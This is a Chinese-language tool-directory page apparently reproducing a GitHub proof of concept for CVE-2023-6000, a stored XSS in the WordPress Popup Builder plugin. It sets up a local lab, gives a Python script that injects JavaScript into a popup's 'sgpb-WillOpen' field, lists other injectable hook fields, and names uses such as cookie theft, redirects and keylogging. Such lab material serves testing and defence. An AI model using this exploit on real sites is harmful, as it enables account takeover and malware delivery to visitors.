Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-6000-POC — 此漏洞展示了一个WordPress弹窗插件中的XSS缺陷,允许攻击者通过存储型XSS注入恶意JavaScript代码。 | Kitploit
工具/GitHubGitHub/ronf98/cve-2023-6000-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试Payload 开发
GitHubronf98/cve-2023-6000-poc

CVE-2023-6000-POC

此漏洞展示了一个WordPress弹窗插件中的XSS缺陷,允许攻击者通过存储型XSS注入恶意JavaScript代码。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概述

  • CVE-ID : CVE-2023-6000
  • CVSS 评分 : 6.1
  • 类型 : 存储型 XSS
  • 修复版本 : Popup Builder 4.2.3

此漏洞允许攻击者利用 WordPress Popup Builder 插件中的跨站脚本(XSS)缺陷。
该插件未能阻止普通用户修改现有弹窗,攻击者可通过向服务器发送特制请求,在弹窗中注入恶意脚本,当用户与弹窗交互时脚本即执行。

对于本 POC,漏洞将通过操控弹窗打开行为触发,注入一个简单的 alert 脚本,在弹窗打开时运行。
此类攻击可导致一系列问题,包括未经授权访问敏感信息以及对受影响网站的进一步利用,可能危及用户数据或整个网站。

POC 环境搭建

  1. 下载 XAMPP 以搭建本地 Web 服务器(最新版本)
  2. 创建 SQL 数据库
  3. 安装 WordPress(最新版本)
  4. 进入 WordPress 后台,安装有漏洞版本的 Popup Builder(<4.2.3)
  5. 设置一个简单的前台页面和弹窗以展示漏洞

步骤 1:XAMPP

对于本 POC,我们可以使用 Windows 10 机器并下载 XAMPP:https://www.apachefriends.org/download.html
安装后,请确保开启 Apache 和 MySQL 模块:

image

步骤 2:SQL 数据库

与大多数内容管理系统一样,WordPress 需要一个数据库来存储所有关键数据。我们将创建的 SQL 数据库将作为所有这些信息的中央存储。

  • 在浏览器中,导航至 http://localhost/phpmyadmin
  • 进入“数据库”选项卡,创建一个新数据库(例如 wordpress_db)。
  • 记下数据库名称,因为在 WordPress 设置时会用到。

步骤 3:WordPress

  • 从官方网站下载 WordPress - https://wordpress.org/download/
  • 下载后,将 WordPress zip 文件解压到 XAMPP 安装目录下的 C:\xampp\htdocs\ 文件夹中。
  • 接着,导航至 http://localhost/wordpress 将出现安装界面。
  • 在数据库名称处输入我们创建的 SQL 数据库名,其余可保持默认(用户名:root,密码:空(XAMPP 默认))。
  • 如果数据库连接成功,则可以设置一个管理员用户供后续访问。

步骤 4:Popup Builder

有漏洞版本的 Popup Builder 插件可从其主站下载:https://wordpress.org/plugins/popup-builder/advanced/
选择一个在 4.2.3 修复之前的旧版本:
image
接着,进入 WordPress 管理页面 - http://localhost/wordpress/wp-login.php
插件 -> 安装插件 -> 上传插件 -> 选择下载的 .ZIP 文件并安装

步骤 5:前台页面和弹窗

在 WordPress 管理页面中,我们可以通过 页面 -> 新建页面 -> 选择模板,创建一个简单的前台页面。
对于弹窗,进入 Popup Builder -> 新建 -> 选择类型并自定义。
本 POC 我选择了订阅弹窗,因为这是现今网站上最常见的弹窗之一。
image

在“显示规则”选项卡中,可以将弹窗附加到前台页面:
image

现在,当我们通过 http://localhost/wordpress/ 进入前台页面时,可以看到弹窗被触发。

漏洞利用

要执行漏洞利用,首先需要找到弹窗 ID。
这可以通过导航至网站、触发弹窗并打开开发者工具中的“网络”选项卡来完成。
查找 admin-ajax.php 请求,这是 WordPress 处理 AJAX 请求的核心组件。Popup Builder 利用它来管理弹窗在 WordPress 内的保存、更新、预览和控制功能。

在“负载”选项卡下,可以找到弹窗 ID:

image

找到弹窗 ID 后,可以使用以下脚本触发漏洞:

root@kitploit:~
import requests

# 定义目标易受攻击网站的 URL
url = "http://localhost/wordpress/"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
    }
data = {
    "sgpb-is-preview": "1",
    "post_ID": "22",     # 使用我们找到的弹窗 ID
    "sgpb-type": "html",
    "sgpb-WillOpen": "alert('Stored XSS Executed Successfully');"     # 自定义 JS 代码在此处
    }

# 发送 POST 请求并输出结果
response = requests.post(url, data=data)
print(response.text)

其他选项

由于我们可以编辑弹窗,因此也能控制自定义 JS 的触发时机。
如果进入 WordPress 管理页面的弹窗设置,可以看到“自定义 JS 或 CSS”选项,这将控制自定义代码的执行时机:

  • "sgpb-ShouldOpen" : 在弹窗开始打开前执行,用于检查是否应打开。
  • "sgpb-WillOpen" : 恰好在弹窗打开前运行,允许进行最后一刻的操作。
  • "sgpb-DidOpen" : 在弹窗完全打开后立即执行,适用于加载后的操作(如 XSS)。
  • "sgpb-ShouldClose" : 在弹窗开始关闭前触发检查或操作。
  • "sgpb-WillClose" : 恰好在弹窗关闭前运行,允许进行最终更改。
  • "sgpb-DidClose" : 在弹窗完全关闭后立即执行。

image

然后我们可以根据需要将其整合到脚本中。

执行

触发脚本后,在 WordPress 管理页面的弹窗自定义 JS 部分可以看到添加了一行新内容:

image

现在,当普通用户进入网站时,会看到以下提示消息:

image

我们还可以看到消息已保存在 SQL 数据库中(默认存储在 wp_postmeta 表中),这证实了它是存储型 XSS:

image

可能用途

Popup Builder 插件中的此存储型 XSS 漏洞允许攻击者嵌入恶意 JavaScript,在用户与受感染弹窗交互时执行。以下是恶意利用的一些方式:

  • 会话劫持:恶意 JS 代码可窃取会话 Cookie 并发送到外部域,使攻击者能够接管用户账户。
  • 重定向:脚本可将用户重定向至伪造的登录页面或其他恶意网站(可通过添加以下 JS 代码实现:window.location.href = 'https://facebook.com')
  • 路过式下载:攻击者可触发下载恶意文件,导致用户不知不觉安装恶意软件。
  • 篡改和虚假信息:注入的脚本可操作页面内容,篡改网站或向用户显示虚假信息。
  • 键盘记录器:恶意脚本可用于记录用户按键,捕获敏感数据和个人信息,然后发送至攻击者的域。
下载工具